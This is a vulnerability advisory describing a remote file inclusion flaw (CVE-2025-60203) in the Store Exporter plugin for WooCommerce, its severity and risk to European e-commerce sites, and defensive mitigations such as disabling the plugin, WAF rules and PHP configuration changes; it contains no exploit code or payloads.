CVE-2025-60203 identifies a Remote File Inclusion (RFI) vulnerability in the Josh Kohlbach Store Exporter plugin for WooCommerce, specifically affecting versions up to 2.7.6. The vulnerability stems from improper validation and control of filenames used in PHP include or require statements, which allows an attacker to specify a remote file URL that the server will include and execute. This type of vulnerability can be exploited remotely without authentication or user interaction, making it highly accessible to attackers. Successful exploitation can lead to unauthorized disclosure of sensitive data, as the attacker can execute arbitrary PHP code or include files that expose confidential information. The CVSS v3.1 score of 7.5 reflects a high severity due to network attack vector, low attack complexity, no privileges required, no user interaction, and a significant confidentiality impact. Although no known exploits have been reported in the wild yet, the nature of the vulnerability makes it a critical concern for sites using the affected plugin. The vulnerability is particularly relevant for WooCommerce stores that rely on the Store Exporter plugin to manage data exports, as attackers could leverage this flaw to compromise the server or extract sensitive business or customer data. The vulnerability was reserved on September 25, 2025, and published on November 6, 2025, but no official patches or mitigation links have been provided at this time.

For European organizations, especially those operating e-commerce platforms using WooCommerce with the Store Exporter plugin, this vulnerability poses a significant risk. Exploitation could lead to unauthorized disclosure of sensitive customer data, including personal and payment information, which would violate GDPR and other data protection regulations, potentially resulting in heavy fines and reputational damage. The ability to remotely include files without authentication increases the attack surface and risk of compromise. Attackers could also use this vulnerability as a foothold to deploy further attacks or malware within the affected infrastructure. The impact is heightened in sectors with high-value transactions or sensitive data, such as retail, finance, and healthcare e-commerce. Additionally, the disruption caused by data breaches or regulatory investigations could lead to operational downtime and loss of customer trust.

European organizations should immediately audit their WooCommerce installations to identify if the Store Exporter plugin version 2.7.6 or earlier is in use. Until an official patch is released, organizations should consider disabling or removing the Store Exporter plugin to eliminate the attack vector. Web application firewalls (WAFs) should be configured to detect and block suspicious requests attempting to exploit file inclusion vulnerabilities, such as those containing remote URLs in parameters related to file includes. Implement strict input validation and sanitization on all user-supplied inputs, especially those that influence file paths or includes. Monitoring web server logs for unusual requests or errors related to file inclusion attempts can help detect exploitation attempts early. Organizations should also ensure their PHP configurations disallow remote file inclusion by disabling allow_url_include and allow_url_fopen directives. Finally, maintain regular backups and have an incident response plan ready to address potential compromises swiftly.